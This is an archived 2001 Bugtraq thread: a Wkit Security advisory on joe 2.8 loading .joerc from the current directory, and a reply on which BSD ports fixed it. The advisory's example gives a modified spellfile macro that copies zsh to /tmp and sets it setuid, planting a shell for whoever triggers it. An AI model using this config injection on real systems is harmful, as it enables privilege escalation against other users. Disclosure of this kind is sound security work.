6152496 2001-02-28 15:13 +0100 /74 rader/ <advisories@WKIT.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-02-28 18:30 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: advisories@WKIT.COM Mottagare: Bugtraq (import) <15685> Ärende: Joe's Own Editor File Handling Error ------------------------------------------------------------ From: advisories@WKIT.COM To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se> WKIT SECURITY AB www.wkit.com TITLE: Joe's Own Editor File Handling Error ADVISORY ID: WSIR-01/02-02 REFERENCE: http://www.wkit.com/advisories CVE: GENERIC-MAP-NOMATCH CREDIT: Christer Öberg, Wkit Security AB CONTACT: advisories@wkit.com CLASS: File Handling Error OBJECT: joe(1) (exec) VENDOR: Josef H. Allen STATUS: REMOTE: No LOCAL: Yes VULNERABLE: Joseph Allen joe 2.8 DATE CREATED: 26/02/2001 LAST UPDATED: VENDOR CONTACT: RELEASE: 28/02/2001 VULNERABILITY DESCRIPTION joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and /usr/local/lib/joerc in that order. Users could be tricked into execute commands if they open/edit a file with joe in a directory where other users can write. CONDITIONS User using joe in a world/group writable directory. EXAMPLE A user copy the default joerc file to a world writable directory and change :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype to :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype Another user opens a file in that directory with joe and run ispell with ^[l the result is a suid shell in /tmp SOLUTION/VENDOR INFORMATION/WORKAROUND DISCLAIMER The contents of this advisory may be distributed freely, provided that no fee is charged and proper credit is given. Wkit Security AB takes no credit for this discovery if someone else has published this information in the public domain before this advisory was released. The information herein is intended for educational purposes, not for malicious use. Wkit Security AB takes no responsibility whatsoever for the use of this information. ABOUT Wkit Security AB is an independent data security company working with security-related services and products. Wkit Security AB Upperudsv. 4 S-464 72 Håverud SWEDEN http://www.wkit.com e-mail: advisories@wkit.com (C) 2001 WKIT SECURITY AB (6152496) ------------------------------------------ Kommentar i text 6153779 av Brad <brad@COMSTYLE.COM> 6153779 2001-02-28 14:25 -0500 /46 rader/ Brad <brad@COMSTYLE.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-02-28 23:48 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: brad@COMSTYLE.COM Mottagare: Bugtraq (import) <15691> Kommentar till text 6152496 av <advisories@WKIT.COM> Ärende: Re: Joe's Own Editor File Handling Error ------------------------------------------------------------ From: Brad <brad@COMSTYLE.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.BSO.4.33.0102281412380.1599-100000@ss5.comstyle.com> After looking through the patches that OpenBSD/FreeBSD/NetBSD has for their joe ports, it looks like joe is still vulnerable in the FreeBSD/NetBSD ports trees, but not in the OpenBSD ports tree as of Dec 22 1998. revision 1.3 date: 1998/12/22 03:58:13; author: form; state: Exp; lines: +74 -55 Do not use ./.xxxrc startup file. Startup files order: ~/.xxxrc, /etc/joe/xxxrc, ${PREFIX}/lib/joe/xxxrc. // Brad brad@comstyle.com brad@openbsd.org >TITLE: Joe's Own Editor File Handling Error >ADVISORY ID: WSIR-01/02-02 >REFERENCE: http://www.wkit.com/advisories >CVE: GENERIC-MAP-NOMATCH >CREDIT: Christer Öberg, Wkit Security AB >CONTACT: advisories@wkit.com >CLASS: File Handling Error >OBJECT: joe(1) (exec) >VENDOR: Josef H. Allen >STATUS: >REMOTE: No >LOCAL: Yes >VULNERABLE: Joseph Allen joe 2.8 > >DATE > CREATED: 26/02/2001 > LAST UPDATED: > VENDOR CONTACT: > RELEASE: 28/02/2001 > >VULNERABILITY DESCRIPTION > joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and > /usr/local/lib/joerc in that order. Users could be tricked into execute > commands if they open/edit a file with joe in a directory where other > users can write. (6153779) --------------------------------(Ombruten)